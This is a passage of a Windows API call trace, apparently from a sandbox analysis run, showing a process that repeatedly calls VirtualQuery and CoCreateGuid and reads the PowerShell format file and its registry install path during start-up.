	[0286.482] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.482] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.482] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.482] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.482] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.482] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x20ebcfbf, Data2=0x154d, Data3=0x4353, Data4=([0]=0xa3, [1]=0xc1, [2]=0xf6, [3]=0xe8, [4]=0xaf, [5]=0x76, [6]=0x8a, [7]=0x44))) returned 0x0
	[0286.483] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.483] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.484] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.485] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.485] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.485] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5870db29, Data2=0x757e, Data3=0x40b2, Data4=([0]=0x9c, [1]=0x54, [2]=0xf5, [3]=0xf9, [4]=0x58, [5]=0x3b, [6]=0xde, [7]=0x78))) returned 0x0
	[0286.485] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xbf0ab92c, Data2=0x8b10, Data3=0x458b, Data4=([0]=0xa2, [1]=0x2c, [2]=0x76, [3]=0x61, [4]=0x15, [5]=0xa2, [6]=0xf7, [7]=0x25))) returned 0x0
	[0286.485] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xb73c9360, Data2=0xf9ac, Data3=0x4927, Data4=([0]=0xa1, [1]=0xe6, [2]=0x4c, [3]=0x1c, [4]=0xaf, [5]=0xac, [6]=0x2c, [7]=0x47))) returned 0x0
	[0286.486] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd5c22e2, Data2=0xafd0, Data3=0x4c36, Data4=([0]=0x9d, [1]=0x1a, [2]=0x9e, [3]=0x9a, [4]=0x47, [5]=0xc, [6]=0x59, [7]=0x36))) returned 0x0
	[0286.486] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x3768e8e6, Data2=0xaf34, Data3=0x4163, Data4=([0]=0x88, [1]=0x68, [2]=0x6f, [3]=0x47, [4]=0x45, [5]=0x46, [6]=0x11, [7]=0x1))) returned 0x0
	[0286.486] VirtualQuery (in: lpAddress=0xcbbb0, lpBuffer=0xcca70, dwLength=0x30 | out: lpBuffer=0xcca70*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.486] VirtualQuery (in: lpAddress=0xcbc40, lpBuffer=0xccb00, dwLength=0x30 | out: lpBuffer=0xccb00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.487] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe77b4e80, Data2=0xf976, Data3=0x4657, Data4=([0]=0xb9, [1]=0x79, [2]=0x35, [3]=0xb2, [4]=0x54, [5]=0x4c, [6]=0x1b, [7]=0xac))) returned 0x0
	[0286.487] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xf6f7dd7, Data2=0xf9, Data3=0x4e7d, Data4=([0]=0x9d, [1]=0xfb, [2]=0x25, [3]=0x21, [4]=0xc0, [5]=0xbe, [6]=0xb2, [7]=0xd0))) returned 0x0
	[0286.487] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xff6ea2f5, Data2=0xce4e, Data3=0x42a4, Data4=([0]=0xa6, [1]=0x4f, [2]=0xb6, [3]=0x9a, [4]=0xd5, [5]=0x5a, [6]=0xcc, [7]=0x64))) returned 0x0
	[0286.487] SetErrorMode (uMode=0x1) returned 0x1
	[0286.487] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0286.488] GetFileType (hFile=0x304) returned 0x1
	[0286.488] SetErrorMode (uMode=0x1) returned 0x1
	[0286.488] GetFileType (hFile=0x304) returned 0x1
	[0286.488] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.488] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.488] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.488] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.488] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.489] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.489] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.489] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.489] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.490] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.490] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.490] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.490] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.491] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.491] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.491] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.491] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.493] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.493] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.493] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.493] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0286.494] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0xe67, lpOverlapped=0x0) returned 1
	[0286.494] ReadFile (in: hFile=0x304, lpBuffer=0x2fe9ff7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2fe9ff7*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0286.494] ReadFile (in: hFile=0x304, lpBuffer=0x2feaa28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x2feaa28*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0286.494] SetErrorMode (uMode=0x1) returned 0x1
	[0286.494] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0286.494] SetErrorMode (uMode=0x1) returned 0x1
	[0286.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.495] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x304) returned 0x0
	[0286.495] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0286.495] CoTaskMemAlloc (cb=0x5a) returned 0x1b835740
	[0286.495] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b835740, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0286.495] CoTaskMemFree (pv=0x1b835740) 
	[0286.495] RegCloseKey (hKey=0x304) returned 0x0
	[0286.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.497] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x43abed07, Data2=0xaccf, Data3=0x4acc, Data4=([0]=0x9a, [1]=0x53, [2]=0xf0, [3]=0x7c, [4]=0xbd, [5]=0x3e, [6]=0x4d, [7]=0x7d))) returned 0x0
	[0286.497] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xc2e5979c, Data2=0xe90c, Data3=0x42db, Data4=([0]=0xba, [1]=0x72, [2]=0x75, [3]=0x16, [4]=0xf0, [5]=0xf, [6]=0x3a, [7]=0xcf))) returned 0x0
	[0287.230] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x977f9516, Data2=0x3843, Data3=0x411d, Data4=([0]=0xbf, [1]=0xdc, [2]=0xb7, [3]=0xd4, [4]=0x4e, [5]=0x87, [6]=0x18, [7]=0xf0))) returned 0x0
	[0287.230] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x7b3eae96, Data2=0x50ab, Data3=0x4ace, Data4=([0]=0x94, [1]=0x27, [2]=0x4b, [3]=0x7f, [4]=0x45, [5]=0xc7, [6]=0x5c, [7]=0xc4))) returned 0x0
	[0287.231] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x617335e8, Data2=0xbd20, Data3=0x4bbd, Data4=([0]=0xb3, [1]=0x13, [2]=0xa0, [3]=0x91, [4]=0x3a, [5]=0xa1, [6]=0xa4, [7]=0x21))) returned 0x0
	[0287.231] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x267576c3, Data2=0xb3e2, Data3=0x4677, Data4=([0]=0x92, [1]=0xa, [2]=0xdd, [3]=0xf4, [4]=0x12, [5]=0xe, [6]=0xc7, [7]=0x49))) returned 0x0
	[0287.231] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x60065dc1, Data2=0x8e3c, Data3=0x4677, Data4=([0]=0xad, [1]=0x41, [2]=0x79, [3]=0x11, [4]=0x49, [5]=0x74, [6]=0x38, [7]=0xc7))) returned 0x0
	[0287.231] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.231] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xfa53b9cf, Data2=0x92de, Data3=0x4bd8, Data4=([0]=0xb0, [1]=0xae, [2]=0xef, [3]=0x9e, [4]=0xa4, [5]=0xcf, [6]=0xe9, [7]=0xa7))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x53f98d6c, Data2=0x5818, Data3=0x470c, Data4=([0]=0xbc, [1]=0x6, [2]=0x3b, [3]=0x2b, [4]=0xf1, [5]=0xee, [6]=0xf4, [7]=0x16))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xaa0d226b, Data2=0xb30, Data3=0x4e32, Data4=([0]=0xb5, [1]=0x2a, [2]=0x55, [3]=0xad, [4]=0xb3, [5]=0x44, [6]=0x2d, [7]=0xea))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x54872678, Data2=0xa042, Data3=0x4abc, Data4=([0]=0xb8, [1]=0x4b, [2]=0x74, [3]=0xae, [4]=0xe1, [5]=0x41, [6]=0x24, [7]=0x28))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd04ddff0, Data2=0xa66e, Data3=0x4c03, Data4=([0]=0x9d, [1]=0x8a, [2]=0x73, [3]=0x15, [4]=0xf7, [5]=0xfe, [6]=0xdc, [7]=0xae))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x9715995c, Data2=0x2fc7, Data3=0x4fea, Data4=([0]=0x97, [1]=0x64, [2]=0x2e, [3]=0x8, [4]=0x23, [5]=0xa4, [6]=0x36, [7]=0x67))) returned 0x0
	[0287.232] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x622c2378, Data2=0x60c3, Data3=0x4b85, Data4=([0]=0x8a, [1]=0xf8, [2]=0x27, [3]=0x75, [4]=0x74, [5]=0x6f, [6]=0x55, [7]=0x20))) returned 0x0
	[0287.233] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x583982f3, Data2=0x68f9, Data3=0x4bb1, Data4=([0]=0x88, [1]=0xdc, [2]=0x10, [3]=0xe7, [4]=0x1e, [5]=0x3b, [6]=0x7, [7]=0x5b))) returned 0x0
	[0287.233] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x75684ae6, Data2=0xee15, Data3=0x43f7, Data4=([0]=0x84, [1]=0xb1, [2]=0x62, [3]=0xaa, [4]=0x50, [5]=0x22, [6]=0x36, [7]=0x64))) returned 0x0
	[0287.233] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd260818, Data2=0x5d99, Data3=0x4b42, Data4=([0]=0xb6, [1]=0x20, [2]=0x59, [3]=0xd1, [4]=0x72, [5]=0xc2, [6]=0x79, [7]=0xe0))) returned 0x0
	[0287.233] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd1b48d01, Data2=0xc08e, Data3=0x45ba, Data4=([0]=0x81, [1]=0xd2, [2]=0x69, [3]=0xc2, [4]=0xcc, [5]=0x6b, [6]=0xe3, [7]=0x44))) returned 0x0
	[0287.233] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xcdd6aca9, Data2=0x804f, Data3=0x4b91, Data4=([0]=0xa0, [1]=0xa1, [2]=0x58, [3]=0x4a, [4]=0xf5, [5]=0xc1, [6]=0xeb, [7]=0x8b))) returned 0x0
	[0287.233] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.234] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.234] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.234] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x421c813a, Data2=0x1ec5, Data3=0x42e4, Data4=([0]=0xa1, [1]=0x2f, [2]=0x94, [3]=0x41, [4]=0x29, [5]=0xbf, [6]=0xdc, [7]=0x8f))) returned 0x0
	[0287.234] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xa0a015d7, Data2=0x6a7e, Data3=0x4efb, Data4=([0]=0x93, [1]=0xe8, [2]=0x13, [3]=0x86, [4]=0xbb, [5]=0xb4, [6]=0xfb, [7]=0xa))) returned 0x0
	[0287.234] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd0ed4d62, Data2=0x35d1, Data3=0x44d9, Data4=([0]=0xbf, [1]=0xdc, [2]=0x71, [3]=0x7f, [4]=0x4a, [5]=0x2e, [6]=0xde, [7]=0x20))) returned 0x0
	[0287.234] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x1e075d59, Data2=0x17ee, Data3=0x4d68, Data4=([0]=0xbe, [1]=0xe7, [2]=0xf1, [3]=0x7b, [4]=0x10, [5]=0x45, [6]=0x26, [7]=0xed))) returned 0x0
